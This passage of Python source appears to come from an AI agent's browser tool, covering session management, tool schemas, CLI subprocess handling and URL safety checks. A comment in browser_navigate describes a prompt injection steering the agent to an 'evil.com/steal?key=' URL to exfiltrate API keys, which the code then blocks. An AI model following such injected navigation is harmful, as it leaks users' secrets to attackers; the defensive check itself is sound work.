(ValueError, OSError): 900 shutil.rmtree(socket_dir, ignore_errors=True) 901 continue 902 903 # Check if the daemon is still alive 904 try: 905 os.kill(daemon_pid, 0) # signal 0 = existence check 906 except ProcessLookupError: 907 # Already dead, just clean up the dir 908 shutil.rmtree(socket_dir, ignore_errors=True) 909 continue 910 except PermissionError: 911 # Alive but owned by someone else — leave it alone 912 continue 913 914 # Daemon is alive and its owner is dead (or legacy + untracked). Reap. 915 try: 916 os.kill(daemon_pid, signal.SIGTERM) 917 logger.info("Reaped orphaned browser daemon PID %d (session %s)", 918 daemon_pid, session_name) 919 reaped += 1 920 except (ProcessLookupError, PermissionError, OSError): 921 pass 922 923 # Clean up the socket directory 924 shutil.rmtree(socket_dir, ignore_errors=True) 925 926 if reaped: 927 logger.info("Reaped %d orphaned browser session(s) from previous run(s)", reaped) 928 929 930 def _browser_cleanup_thread_worker(): 931 """ 932 Background thread that periodically cleans up inactive browser sessions. 933 934 Runs every 30 seconds and checks for sessions that haven't been used 935 within the BROWSER_SESSION_INACTIVITY_TIMEOUT period. 936 On first run, also reaps orphaned sessions from previous process lifetimes. 937 """ 938 # One-time orphan reap on startup 939 try: 940 _reap_orphaned_browser_sessions() 941 except Exception as e: 942 logger.warning("Orphan reap error: %s", e) 943 944 while _cleanup_running: 945 try: 946 _cleanup_inactive_browser_sessions() 947 except Exception as e: 948 logger.warning("Cleanup thread error: %s", e) 949 950 # Sleep in 1-second intervals so we can stop quickly if needed 951 for _ in range(30): 952 if not _cleanup_running: 953 break 954 time.sleep(1) 955 956 957 def _start_browser_cleanup_thread(): 958 """Start the background cleanup thread if not already running.""" 959 global _cleanup_thread, _cleanup_running 960 961 with _cleanup_lock: 962 if _cleanup_thread is None or not _cleanup_thread.is_alive(): 963 _cleanup_running = True 964 _cleanup_thread = threading.Thread( 965 target=_browser_cleanup_thread_worker, 966 daemon=True, 967 name="browser-cleanup" 968 ) 969 _cleanup_thread.start() 970 logger.info("Started inactivity cleanup thread (timeout: %ss)", BROWSER_SESSION_INACTIVITY_TIMEOUT) 971 972 973 def _stop_browser_cleanup_thread(): 974 """Stop the background cleanup thread.""" 975 global _cleanup_running 976 _cleanup_running = False 977 if _cleanup_thread is not None: 978 _cleanup_thread.join(timeout=5) 979 980 981 def _update_session_activity(task_id: str): 982 """Update the last activity timestamp for a session.""" 983 with _cleanup_lock: 984 _session_last_activity[task_id] = time.time() 985 986 987 # Register cleanup thread stop on exit 988 atexit.register(_stop_browser_cleanup_thread) 989 990 991 # ============================================================================ 992 # Tool Schemas 993 # ============================================================================ 994 995 BROWSER_TOOL_SCHEMAS = [ 996 { 997 "name": "browser_navigate", 998 "description": "Navigate to a URL in the browser. Initializes the session and loads the page. Must be called before other browser tools. For simple information retrieval, prefer web_search or web_extract (faster, cheaper). For plain-text endpoints — URLs ending in .md, .txt, .json, .yaml, .yml, .csv, .xml, raw.githubusercontent.com, or any documented API endpoint — prefer curl via the terminal tool or web_extract; the browser stack is overkill and much slower for these. Use browser tools when you need to interact with a page (click, fill forms, dynamic content). Returns a compact page snapshot with interactive elements and ref IDs — no need to call browser_snapshot separately after navigating.", 999 "parameters": { 1000 "type": "object", 1001 "properties": { 1002 "url": { 1003 "type": "string", 1004 "description": "The URL to navigate to (e.g., 'https://example.com')" 1005 } 1006 }, 1007 "required": ["url"] 1008 } 1009 }, 1010 { 1011 "name": "browser_snapshot", 1012 "description": "Get a text-based snapshot of the current page's accessibility tree. Returns interactive elements with ref IDs (like @e1, @e2) for browser_click and browser_type. full=false (default): compact view with interactive elements. full=true: complete page content. Snapshots over 8000 chars are truncated or LLM-summarized. Requires browser_navigate first. Note: browser_navigate already returns a compact snapshot — use this to refresh after interactions that change the page, or with full=true for complete content.", 1013 "parameters": { 1014 "type": "object", 1015 "properties": { 1016 "full": { 1017 "type": "boolean", 1018 "description": "If true, returns complete page content. If false (default), returns compact view with interactive elements only.", 1019 "default": False 1020 } 1021 }, 1022 "required": [] 1023 } 1024 }, 1025 { 1026 "name": "browser_click", 1027 "description": "Click on an element identified by its ref ID from the snapshot (e.g., '@e5'). The ref IDs are shown in square brackets in the snapshot output. Requires browser_navigate and browser_snapshot to be called first.", 1028 "parameters": { 1029 "type": "object", 1030 "properties": { 1031 "ref": { 1032 "type": "string", 1033 "description": "The element reference from the snapshot (e.g., '@e5', '@e12')" 1034 } 1035 }, 1036 "required": ["ref"] 1037 } 1038 }, 1039 { 1040 "name": "browser_type", 1041 "description": "Type text into an input field identified by its ref ID. Clears the field first, then types the new text. Requires browser_navigate and browser_snapshot to be called first.", 1042 "parameters": { 1043 "type": "object", 1044 "properties": { 1045 "ref": { 1046 "type": "string", 1047 "description": "The element reference from the snapshot (e.g., '@e3')" 1048 }, 1049 "text": { 1050 "type": "string", 1051 "description": "The text to type into the field" 1052 } 1053 }, 1054 "required": ["ref", "text"] 1055 } 1056 }, 1057 { 1058 "name": "browser_scroll", 1059 "description": "Scroll the page in a direction. Use this to reveal more content that may be below or above the current viewport. Requires browser_navigate to be called first.", 1060 "parameters": { 1061 "type": "object", 1062 "properties": { 1063 "direction": { 1064 "type": "string", 1065 "enum": ["up", "down"], 1066 "description": "Direction to scroll" 1067 } 1068 }, 1069 "required": ["direction"] 1070 } 1071 }, 1072 { 1073 "name": "browser_back", 1074 "description": "Navigate back to the previous page in browser history. Requires browser_navigate to be called first.", 1075 "parameters": { 1076 "type": "object", 1077 "properties": {}, 1078 "required": [] 1079 } 1080 }, 1081 { 1082 "name": "browser_press", 1083 "description": "Press a keyboard key. Useful for submitting forms (Enter), navigating (Tab), or keyboard shortcuts. Requires browser_navigate to be called first.", 1084 "parameters": { 1085 "type": "object", 1086 "properties": { 1087 "key": { 1088 "type": "string", 1089 "description": "Key to press (e.g., 'Enter', 'Tab', 'Escape', 'ArrowDown')" 1090 } 1091 }, 1092 "required": ["key"] 1093 } 1094 }, 1095 { 1096 "name": "browser_get_images", 1097 "description": "Get a list of all images on the current page with their URLs and alt text. Useful for finding images to analyze with the vision tool. Requires browser_navigate to be called first.", 1098 "parameters": { 1099 "type": "object", 1100 "properties": {}, 1101 "required": [] 1102 } 1103 }, 1104 { 1105 "name": "browser_vision", 1106 "description": "Take a screenshot of the current page and analyze it with vision AI. Use this when you need to visually understand what's on the page - especially useful for CAPTCHAs, visual verification challenges, complex layouts, or when the text snapshot doesn't capture important visual information. Returns both the AI analysis and a screenshot_path that you can share with the user by including MEDIA:<screenshot_path> in your response. Requires browser_navigate to be called first.", 1107 "parameters": { 1108 "type": "object", 1109 "properties": { 1110 "question": { 1111 "type": "string", 1112 "description": "What you want to know about the page visually. Be specific about what you're looking for." 1113 }, 1114 "annotate": { 1115 "type": "boolean", 1116 "default": False, 1117 "description": "If true, overlay numbered [N] labels on interactive elements. Each [N] maps to ref @eN for subsequent browser commands. Useful for QA and spatial reasoning about page layout." 1118 } 1119 }, 1120 "required": ["question"] 1121 } 1122 }, 1123 { 1124 "name": "browser_console", 1125 "description": "Get browser console output and JavaScript errors from the current page. Returns console.log/warn/error/info messages and uncaught JS exceptions. Use this to detect silent JavaScript errors, failed API calls, and application warnings. Requires browser_navigate to be called first. When 'expression' is provided, evaluates JavaScript in the page context and returns the result — use this for DOM inspection, reading page state, or extracting data programmatically.", 1126 "parameters": { 1127 "type": "object", 1128 "properties": { 1129 "clear": { 1130 "type": "boolean", 1131 "default": False, 1132 "description": "If true, clear the message buffers after reading" 1133 }, 1134 "expression": { 1135 "type": "string", 1136 "description": "JavaScript expression to evaluate in the page context. Runs in the browser like DevTools console — full access to DOM, window, document. Return values are serialized to JSON. Example: 'document.title' or 'document.querySelectorAll(\"a\").length'" 1137 } 1138 }, 1139 "required": [] 1140 } 1141 }, 1142 ] 1143 1144 1145 # ============================================================================ 1146 # Utility Functions 1147 # ============================================================================ 1148 1149 def _create_local_session(task_id: str) -> Dict[str, str]: 1150 import uuid 1151 session_name = f"h_{uuid.uuid4().hex[:10]}" 1152 logger.info("Created local browser session %s for task %s", 1153 session_name, task_id) 1154 return { 1155 "session_name": session_name, 1156 "bb_session_id": None, 1157 "cdp_url": None, 1158 "features": {"local": True}, 1159 } 1160 1161 1162 def _create_cdp_session(task_id: str, cdp_url: str) -> Dict[str, str]: 1163 """Create a session that connects to a user-supplied CDP endpoint.""" 1164 import uuid 1165 session_name = f"cdp_{uuid.uuid4().hex[:10]}" 1166 logger.info("Created CDP browser session %s → %s for task %s", 1167 session_name, cdp_url, task_id) 1168 return { 1169 "session_name": session_name, 1170 "bb_session_id": None, 1171 "cdp_url": cdp_url, 1172 "features": {"cdp_override": True}, 1173 } 1174 1175 1176 def _get_session_info(task_id: Optional[str] = None) -> Dict[str, str]: 1177 """ 1178 Get or create session info for the given session key. 1179 1180 In cloud mode, creates a Browserbase session with proxies enabled. 1181 In local mode, generates a session name for agent-browser --session. 1182 Also starts the inactivity cleanup thread and updates activity tracking. 1183 Thread-safe: multiple subagents can call this concurrently. 1184 1185 Args: 1186 task_id: Session key. Normally the task_id as-is, but may carry the 1187 ``::local`` suffix for the hybrid-routing local sidecar — in that 1188 case the cloud provider is skipped even when one is configured, 1189 and a local Chromium session is created instead. 1190 1191 Returns: 1192 Dict with session_name (always), bb_session_id + cdp_url (cloud only) 1193 """ 1194 if task_id is None: 1195 task_id = "default" 1196 1197 # Start the cleanup thread if not running (handles inactivity timeouts) 1198 _start_browser_cleanup_thread() 1199 1200 # Update activity timestamp for this session 1201 _update_session_activity(task_id) 1202 1203 with _cleanup_lock: 1204 # Check if we already have a session for this task 1205 if task_id in _active_sessions: 1206 return _active_sessions[task_id] 1207 1208 # Hybrid routing: session keys ending with ``::local`` force a local 1209 # Chromium regardless of the globally-configured cloud provider. Public 1210 # URLs in the same conversation continue to use the cloud session under 1211 # the bare task_id key. 1212 force_local = _is_local_sidecar_key(task_id) 1213 1214 # Create session outside the lock (network call in cloud mode) 1215 cdp_override = _get_cdp_override() 1216 if cdp_override and not force_local: 1217 session_info = _create_cdp_session(task_id, cdp_override) 1218 elif force_local: 1219 session_info = _create_local_session(task_id) 1220 else: 1221 provider = _get_cloud_provider() 1222 if provider is None: 1223 session_info = _create_local_session(task_id) 1224 else: 1225 try: 1226 session_info = provider.create_session(task_id) 1227 # Validate cloud provider returned a usable session 1228 if not session_info or not isinstance(session_info, dict): 1229 raise ValueError(f"Cloud provider returned invalid session: {session_info!r}") 1230 if session_info.get("cdp_url"): 1231 # Some cloud providers (including Browser-Use v3) return an HTTP 1232 # CDP discovery URL instead of a raw websocket endpoint. 1233 session_info = dict(session_info) 1234 session_info["cdp_url"] = _resolve_cdp_override(str(session_info["cdp_url"])) 1235 except Exception as e: 1236 provider_name = type(provider).__name__ 1237 logger.warning( 1238 "Cloud provider %s failed (%s); attempting fallback to local " 1239 "Chromium for task %s", 1240 provider_name, e, task_id, 1241 exc_info=True, 1242 ) 1243 try: 1244 session_info = _create_local_session(task_id) 1245 except Exception as local_error: 1246 raise RuntimeError( 1247 f"Cloud provider {provider_name} failed ({e}) and local " 1248 f"fallback also failed ({local_error})" 1249 ) from e 1250 # Mark session as degraded for observability 1251 if isinstance(session_info, dict): 1252 session_info = dict(session_info) 1253 session_info["fallback_from_cloud"] = True 1254 session_info["fallback_reason"] = str(e) 1255 session_info["fallback_provider"] = provider_name 1256 1257 with _cleanup_lock: 1258 # Double-check: another thread may have created a session while we 1259 # were doing the network call. Use the existing one to avoid leaking 1260 # orphan cloud sessions. 1261 if task_id in _active_sessions: 1262 return _active_sessions[task_id] 1263 _active_sessions[task_id] = session_info 1264 1265 # Lazy-start the CDP supervisor now that the session exists (if the 1266 # backend surfaces a CDP URL via override or session_info["cdp_url"]). 1267 # Idempotent; swallows errors. See _ensure_cdp_supervisor for details. 1268 # Skip for local sidecars — they have no CDP URL. 1269 if not force_local: 1270 _ensure_cdp_supervisor(task_id) 1271 1272 return session_info 1273 1274 1275 1276 def _find_agent_browser() -> str: 1277 """ 1278 Find the agent-browser CLI executable. 1279 1280 Checks in order: current PATH, Homebrew/common bin dirs, Hermes-managed 1281 node, local node_modules/.bin/, npx fallback. 1282 1283 Returns: 1284 Path to agent-browser executable 1285 1286 Raises: 1287 FileNotFoundError: If agent-browser is not installed 1288 """ 1289 global _cached_agent_browser, _agent_browser_resolved 1290 if _agent_browser_resolved: 1291 if _cached_agent_browser is None: 1292 raise FileNotFoundError( 1293 "agent-browser CLI not found (cached). Install it with: " 1294 f"{_browser_install_hint()}\n" 1295 "Or run 'npm install' in the repo root to install locally.\n" 1296 "Or ensure npx is available in your PATH." 1297 ) 1298 return _cached_agent_browser 1299 1300 # Note: _agent_browser_resolved is set at each return site below 1301 # (not before the search) to prevent a race where a concurrent thread 1302 # sees resolved=True but _cached_agent_browser is still None. 1303 1304 # Check if it's in PATH (global install) 1305 which_result = shutil.which("agent-browser") 1306 if which_result: 1307 _cached_agent_browser = which_result 1308 _agent_browser_resolved = True 1309 return which_result 1310 1311 # Build an extended search PATH including Hermes-managed Node, macOS 1312 # versioned Homebrew installs, and fallback system dirs like Termux. 1313 extended_path = _merge_browser_path("") 1314 if extended_path: 1315 which_result = shutil.which("agent-browser", path=extended_path) 1316 if which_result: 1317 _cached_agent_browser = which_result 1318 _agent_browser_resolved = True 1319 return which_result 1320 1321 # Check local node_modules/.bin/ (npm install in repo root) 1322 repo_root = Path(__file__).parent.parent 1323 local_bin = repo_root / "node_modules" / ".bin" / "agent-browser" 1324 if local_bin.exists(): 1325 _cached_agent_browser = str(local_bin) 1326 _agent_browser_resolved = True 1327 return _cached_agent_browser 1328 1329 # Check common npx locations (also search the extended fallback PATH) 1330 npx_path = shutil.which("npx") 1331 if not npx_path and extended_path: 1332 npx_path = shutil.which("npx", path=extended_path) 1333 if npx_path: 1334 _cached_agent_browser = "npx agent-browser" 1335 _agent_browser_resolved = True 1336 return _cached_agent_browser 1337 1338 # Nothing found — cache the failure so subsequent calls don't re-scan. 1339 _agent_browser_resolved = True 1340 raise FileNotFoundError( 1341 "agent-browser CLI not found. Install it with: " 1342 f"{_browser_install_hint()}\n" 1343 "Or run 'npm install' in the repo root to install locally.\n" 1344 "Or ensure npx is available in your PATH." 1345 ) 1346 1347 1348 def _extract_screenshot_path_from_text(text: str) -> Optional[str]: 1349 """Extract a screenshot file path from agent-browser human-readable output.""" 1350 if not text: 1351 return None 1352 1353 patterns = [ 1354 r"Screenshot saved to ['\"](?P<path>/[^'\"]+?\.png)['\"]", 1355 r"Screenshot saved to (?P<path>/\S+?\.png)(?:\s|$)", 1356 r"(?P<path>/\S+?\.png)(?:\s|$)", 1357 ] 1358 1359 for pattern in patterns: 1360 match = re.search(pattern, text) 1361 if match: 1362 path = match.group("path").strip().strip("'\"") 1363 if path: 1364 return path 1365 1366 return None 1367 1368 1369 def _run_browser_command( 1370 task_id: str, 1371 command: str, 1372 args: List[str] = None, 1373 timeout: Optional[int] = None, 1374 ) -> Dict[str, Any]: 1375 """ 1376 Run an agent-browser CLI command using our pre-created Browserbase session. 1377 1378 Args: 1379 task_id: Task identifier to get the right session 1380 command: The command to run (e.g., "open", "click") 1381 args: Additional arguments for the command 1382 timeout: Command timeout in seconds. ``None`` reads 1383 ``browser.command_timeout`` from config (default 30s). 1384 1385 Returns: 1386 Parsed JSON response from agent-browser 1387 """ 1388 if timeout is None: 1389 timeout = _get_command_timeout() 1390 args = args or [] 1391 1392 # Build the command 1393 try: 1394 browser_cmd = _find_agent_browser() 1395 except FileNotFoundError as e: 1396 logger.warning("agent-browser CLI not found: %s", e) 1397 return {"success": False, "error": str(e)} 1398 1399 if _requires_real_termux_browser_install(browser_cmd): 1400 error = _termux_browser_install_error() 1401 logger.warning("browser command blocked on Termux: %s", error) 1402 return {"success": False, "error": error} 1403 1404 # Local mode with no Chromium on disk: fail fast with an actionable 1405 # message instead of hanging for _command_timeout seconds per call. 1406 if _is_local_mode() and not _chromium_installed(): 1407 if _running_in_docker(): 1408 hint = ( 1409 "Chromium browser is missing. You're running in Docker — pull " 1410 "the latest image to get the bundled Chromium: " 1411 "docker pull ghcr.io/nousresearch/hermes-agent:latest" 1412 ) 1413 else: 1414 hint = ( 1415 "Chromium browser is missing. Install it with: " 1416 "npx agent-browser install --with-deps " 1417 "(or: npx playwright install --with-deps chromium)" 1418 ) 1419 logger.warning("browser command blocked: %s", hint) 1420 return {"success": False, "error": hint} 1421 1422 from tools.interrupt import is_interrupted 1423 if is_interrupted(): 1424 return {"success": False, "error": "Interrupted"} 1425 1426 # Get session info (creates Browserbase session with proxies if needed) 1427 try: 1428 session_info = _get_session_info(task_id) 1429 except Exception as e: 1430 logger.warning("Failed to create browser session for task=%s: %s", task_id, e) 1431 return {"success": False, "error": f"Failed to create browser session: {str(e)}"} 1432 1433 # Build the command with the appropriate backend flag. 1434 # Cloud mode: --cdp <websocket_url> connects to Browserbase. 1435 # Local mode: --session <name> launches a local headless Chromium. 1436 # The rest of the command (--json, command, args) is identical. 1437 if session_info.get("cdp_url"): 1438 # Cloud mode — connect to remote Browserbase browser via CDP 1439 # IMPORTANT: Do NOT use --session with --cdp. In agent-browser >=0.13, 1440 # --session creates a local browser instance and silently ignores --cdp. 1441 backend_args = ["--cdp", session_info["cdp_url"]] 1442 else: 1443 # Local mode — launch a headless Chromium instance 1444 backend_args = ["--session", session_info["session_name"]] 1445 1446 # Keep concrete executable paths intact, even when they contain spaces. 1447 # Only the synthetic npx fallback needs to expand into multiple argv items. 1448 cmd_prefix = ["npx", "agent-browser"] if browser_cmd == "npx agent-browser" else [browser_cmd] 1449 1450 cmd_parts = cmd_prefix + backend_args + [ 1451 "--json", 1452 command 1453 ] + args 1454 1455 try: 1456 # Give each task its own socket directory to prevent concurrency conflicts. 1457 # Without this, parallel workers fight over the same default socket path, 1458 # causing "Failed to create socket directory: Permission denied" errors. 1459 task_socket_dir = os.path.join( 1460 _socket_safe_tmpdir(), 1461 f"agent-browser-{session_info['session_name']}" 1462 ) 1463 os.makedirs(task_socket_dir, mode=0o700, exist_ok=True) 1464 # Record this hermes PID as the session owner (cross-process safe 1465 # orphan detection — see _write_owner_pid). 1466 _write_owner_pid(task_socket_dir, session_info['session_name']) 1467 logger.debug("browser cmd=%s task=%s socket_dir=%s (%d chars)", 1468 command, task_id, task_socket_dir, len(task_socket_dir)) 1469 1470 browser_env = {**os.environ} 1471 1472 # Ensure subprocesses inherit the same browser-specific PATH fallbacks 1473 # used during CLI discovery. 1474 browser_env["PATH"] = _merge_browser_path(browser_env.get("PATH", "")) 1475 browser_env["AGENT_BROWSER_SOCKET_DIR"] = task_socket_dir 1476 1477 # Tell the agent-browser daemon to self-terminate after being idle 1478 # for our configured inactivity timeout. This is the daemon-side 1479 # counterpart to our Python-side _cleanup_inactive_browser_sessions 1480 # — the daemon kills itself and its Chrome children when no CLI 1481 # commands arrive within the window. Added in agent-browser 0.24. 1482 if "AGENT_BROWSER_IDLE_TIMEOUT_MS" not in browser_env: 1483 idle_ms = str(BROWSER_SESSION_INACTIVITY_TIMEOUT * 1000) 1484 browser_env["AGENT_BROWSER_IDLE_TIMEOUT_MS"] = idle_ms 1485 1486 # Inject --no-sandbox when needed (issue #15765): 1487 # - Running as root: Chromium always refuses to start without it 1488 # - Ubuntu 23.10+ / AppArmor systems: unprivileged user namespaces 1489 # are restricted, causing Chromium to exit with "No usable sandbox" 1490 # even for non-root users running under systemd or containers. 1491 if "AGENT_BROWSER_CHROME_FLAGS" not in browser_env: 1492 _needs_sandbox_bypass = False 1493 if hasattr(os, "geteuid") and os.geteuid() == 0: 1494 _needs_sandbox_bypass = True 1495 logger.debug("browser: running as root — injecting --no-sandbox") 1496 else: 1497 # Detect AppArmor user namespace restrictions (Ubuntu 23.10+) 1498 _userns_restrict = "/proc/sys/kernel/apparmor_restrict_unprivileged_userns" 1499 try: 1500 with open(_userns_restrict) as _f: 1501 if _f.read().strip() == "1": 1502 _needs_sandbox_bypass = True 1503 logger.debug( 1504 "browser: AppArmor userns restrictions detected — " 1505 "injecting --no-sandbox" 1506 ) 1507 except OSError: 1508 pass 1509 if _needs_sandbox_bypass: 1510 browser_env["AGENT_BROWSER_CHROME_FLAGS"] = ( 1511 "--no-sandbox --disable-dev-shm-usage" 1512 ) 1513 1514 # Use temp files for stdout/stderr instead of pipes. 1515 # agent-browser starts a background daemon that inherits file 1516 # descriptors. With capture_output=True (pipes), the daemon keeps 1517 # the pipe fds open after the CLI exits, so communicate() never 1518 # sees EOF and blocks until the timeout fires. 1519 stdout_path = os.path.join(task_socket_dir, f"_stdout_{command}") 1520 stderr_path = os.path.join(task_socket_dir, f"_stderr_{command}") 1521 stdout_fd = os.open(stdout_path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600) 1522 stderr_fd = os.open(stderr_path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600) 1523 try: 1524 proc = subprocess.Popen( 1525 cmd_parts, 1526 stdout=stdout_fd, 1527 stderr=stderr_fd, 1528 stdin=subprocess.DEVNULL, 1529 env=browser_env, 1530 ) 1531 finally: 1532 os.close(stdout_fd) 1533 os.close(stderr_fd) 1534 1535 try: 1536 proc.wait(timeout=timeout) 1537 except subprocess.TimeoutExpired: 1538 proc.kill() 1539 proc.wait() 1540 logger.warning("browser '%s' timed out after %ds (task=%s, socket_dir=%s)", 1541 command, timeout, task_id, task_socket_dir) 1542 return {"success": False, "error": f"Command timed out after {timeout} seconds"} 1543 1544 with open(stdout_path, "r") as f: 1545 stdout = f.read() 1546 with open(stderr_path, "r") as f: 1547 stderr = f.read() 1548 returncode = proc.returncode 1549 1550 # Clean up temp files (best-effort) 1551 for p in (stdout_path, stderr_path): 1552 try: 1553 os.unlink(p) 1554 except OSError: 1555 pass 1556 1557 # Log stderr for diagnostics — use warning level on failure so it's visible 1558 if stderr and stderr.strip(): 1559 level = logging.WARNING if returncode != 0 else logging.DEBUG 1560 logger.log(level, "browser '%s' stderr: %s", command, stderr.strip()[:500]) 1561 1562 stdout_text = stdout.strip() 1563 1564 # Empty output with rc=0 is a broken state — treat as failure rather 1565 # than silently returning {"success": True, "data": {}}. 1566 # Some commands (close, record) legitimately return no output. 1567 if not stdout_text and returncode == 0 and command not in _EMPTY_OK_COMMANDS: 1568 logger.warning("browser '%s' returned empty output (rc=0)", command) 1569 return {"success": False, "error": f"Browser command '{command}' returned no output"} 1570 1571 if stdout_text: 1572 try: 1573 parsed = json.loads(stdout_text) 1574 # Warn if snapshot came back empty (common sign of daemon/CDP issues) 1575 if command == "snapshot" and parsed.get("success"): 1576 snap_data = parsed.get("data", {}) 1577 if not snap_data.get("snapshot") and not snap_data.get("refs"): 1578 logger.warning("snapshot returned empty content. " 1579 "Possible stale daemon or CDP connection issue. " 1580 "returncode=%s", returncode) 1581 return parsed 1582 except json.JSONDecodeError: 1583 raw = stdout_text[:2000] 1584 logger.warning("browser '%s' returned non-JSON output (rc=%s): %s", 1585 command, returncode, raw[:500]) 1586 1587 if command == "screenshot": 1588 stderr_text = (stderr or "").strip() 1589 combined_text = "\n".join( 1590 part for part in [stdout_text, stderr_text] if part 1591 ) 1592 recovered_path = _extract_screenshot_path_from_text(combined_text) 1593 1594 if recovered_path and Path(recovered_path).exists(): 1595 logger.info( 1596 "browser 'screenshot' recovered file from non-JSON output: %s", 1597 recovered_path, 1598 ) 1599 return { 1600 "success": True, 1601 "data": { 1602 "path": recovered_path, 1603 "raw": raw, 1604 }, 1605 } 1606 1607 return { 1608 "success": False, 1609 "error": f"Non-JSON output from agent-browser for '{command}': {raw}" 1610 } 1611 1612 # Check for errors 1613 if returncode != 0: 1614 error_msg = stderr.strip() if stderr else f"Command failed with code {returncode}" 1615 logger.warning("browser '%s' failed (rc=%s): %s", command, returncode, error_msg[:300]) 1616 return {"success": False, "error": error_msg} 1617 1618 return {"success": True, "data": {}} 1619 1620 except Exception as e: 1621 logger.warning("browser '%s' exception: %s", command, e, exc_info=True) 1622 return {"success": False, "error": str(e)} 1623 1624 1625 def _extract_relevant_content( 1626 snapshot_text: str, 1627 user_task: Optional[str] = None 1628 ) -> str: 1629 """Use LLM to extract relevant content from a snapshot based on the user's task. 1630 1631 Falls back to simple truncation when no auxiliary text model is configured. 1632 """ 1633 if user_task: 1634 extraction_prompt = ( 1635 f"You are a content extractor for a browser automation agent.\n\n" 1636 f"The user's task is: {user_task}\n\n" 1637 f"Given the following page snapshot (accessibility tree representation), " 1638 f"extract and summarize the most relevant information for completing this task. Focus on:\n" 1639 f"1. Interactive elements (buttons, links, inputs) that might be needed\n" 1640 f"2. Text content relevant to the task (prices, descriptions, headings, important info)\n" 1641 f"3. Navigation structure if relevant\n\n" 1642 f"Keep ref IDs (like [ref=e5]) for interactive elements so the agent can use them.\n\n" 1643 f"Page Snapshot:\n{snapshot_text}\n\n" 1644 f"Provide a concise summary that preserves actionable information and relevant content." 1645 ) 1646 else: 1647 extraction_prompt = ( 1648 f"Summarize this page snapshot, preserving:\n" 1649 f"1. All interactive elements with their ref IDs (like [ref=e5])\n" 1650 f"2. Key text content and headings\n" 1651 f"3. Important information visible on the page\n\n" 1652 f"Page Snapshot:\n{snapshot_text}\n\n" 1653 f"Provide a concise summary focused on interactive elements and key content." 1654 ) 1655 1656 # Redact secrets from snapshot before sending to auxiliary LLM. 1657 # Without this, a page displaying env vars or API keys would leak 1658 # secrets to the extraction model before run_agent.py's general 1659 # redaction layer ever sees the tool result. 1660 from agent.redact import redact_sensitive_text 1661 extraction_prompt = redact_sensitive_text(extraction_prompt) 1662 1663 try: 1664 call_kwargs = { 1665 "task": "web_extract", 1666 "messages": [{"role": "user", "content": extraction_prompt}], 1667 "max_tokens": 4000, 1668 "temperature": 0.1, 1669 } 1670 model = _get_extraction_model() 1671 if model: 1672 call_kwargs["model"] = model 1673 response = call_llm(**call_kwargs) 1674 extracted = (response.choices[0].message.content or "").strip() or _truncate_snapshot(snapshot_text) 1675 # Redact any secrets the auxiliary LLM may have echoed back. 1676 return redact_sensitive_text(extracted) 1677 except Exception: 1678 return _truncate_snapshot(snapshot_text) 1679 1680 1681 def _truncate_snapshot(snapshot_text: str, max_chars: int = 8000) -> str: 1682 """Structure-aware truncation for snapshots. 1683 1684 Cuts at line boundaries so that accessibility tree elements are never 1685 split mid-line, and appends a note telling the agent how much was 1686 omitted. 1687 1688 Args: 1689 snapshot_text: The snapshot text to truncate 1690 max_chars: Maximum characters to keep 1691 1692 Returns: 1693 Truncated text with indicator if truncated 1694 """ 1695 if len(snapshot_text) <= max_chars: 1696 return snapshot_text 1697 1698 lines = snapshot_text.split('\n') 1699 result: list[str] = [] 1700 chars = 0 1701 for line in lines: 1702 if chars + len(line) + 1 > max_chars - 80: # reserve space for note 1703 break 1704 result.append(line) 1705 chars += len(line) + 1 1706 remaining = len(lines) - len(result) 1707 if remaining > 0: 1708 result.append(f'\n[... {remaining} more lines truncated, use browser_snapshot for full content]') 1709 return '\n'.join(result) 1710 1711 1712 # ============================================================================ 1713 # Browser Tool Functions 1714 # ============================================================================ 1715 1716 def browser_navigate(url: str, task_id: Optional[str] = None) -> str: 1717 """ 1718 Navigate to a URL in the browser. 1719 1720 Args: 1721 url: The URL to navigate to 1722 task_id: Task identifier for session isolation 1723 1724 Returns: 1725 JSON string with navigation result (includes stealth features info on first nav) 1726 """ 1727 # Secret exfiltration protection — block URLs that embed API keys or 1728 # tokens in query parameters. A prompt injection could trick the agent 1729 # into navigating to https://evil.com/steal?key=sk-ant-... to exfil secrets. 1730 # Also check URL-decoded form to catch %2D encoding tricks (e.g. sk%2Dant%2D...). 1731 import urllib.parse 1732 from agent.redact import _PREFIX_RE 1733 url_decoded = urllib.parse.unquote(url) 1734 if _PREFIX_RE.search(url) or _PREFIX_RE.search(url_decoded): 1735 return json.dumps({ 1736 "success": False, 1737 "error": "Blocked: URL contains what appears to be an API key or token. " 1738 "Secrets must not be sent in URLs.", 1739 }) 1740 1741 # SSRF protection — block private/internal addresses before navigating. 1742 # Skipped for local backends (Camofox, headless Chromium without a cloud 1743 # provider) because the agent already has full local network access via 1744 # the terminal tool. Also skipped when hybrid routing will auto-spawn a 1745 # local Chromium sidecar for this URL (cloud provider configured + 1746 # private URL + ``browser.auto_local_for_private_urls`` enabled) — the 1747 # cloud provider never sees the URL in that case. Can also be opted 1748 # out globally via ``browser.allow_private_urls`` in config. 1749 effective_task_id = task_id or "default" 1750 nav_session_key = _navigation_session_key(effective_task_id, url) 1751 auto_local_this_nav = _is_local_sidecar_key(nav_session_key) 1752 1753 if ( 1754 not _is_local_backend() 1755 and not auto_local_this_nav 1756 and not _allow_private_urls() 1757 and not _is_safe_url(url) 1758 ): 1759 return json.dumps({ 1760 "success": False, 1761 "error": "Blocked: URL targets a private or internal address", 1762 }) 1763 1764 # Website policy check — block before navigating 1765 blocked = check_website_access(url) 1766 if blocked: 1767 return json.dumps({ 1768 "success": False, 1769 "error": blocked["message"], 1770 "blocked_by_policy": {"host": blocked["host"], "rule": blocked["rule"], "source": blocked["source"]}, 1771 }) 1772 1773 # Camofox backend — delegate after safety checks pass 1774 if _is_camofox_mode(): 1775 from tools.browser_camofox import camofox_navigate 1776 return camofox_navigate(url, task_id) 1777 1778 if auto_local_this_nav: 1779 logger.info( 1780 "browser_navigate: auto-routing %s to local Chromium sidecar " 1781 "(cloud provider %s stays on cloud for public URLs; " 1782 "set browser.auto_local_for_private_urls: false to disable)", 1783 url, 1784 type(_get_cloud_provider()).__name__ if _get_cloud_provider() else "none", 1785 ) 1786 1787 # Get session info to check if this is a new session 1788 # (will create one with features logged if not exists) 1789 session_info = _get_session_info(nav_session_key) 1790 is_first_nav = session_info.get("_first_nav", True) 1791 1792 # Auto-start recording if configured and this is first navigation 1793 if is_first_nav: 1794 session_info["_first_nav"] = False 1795 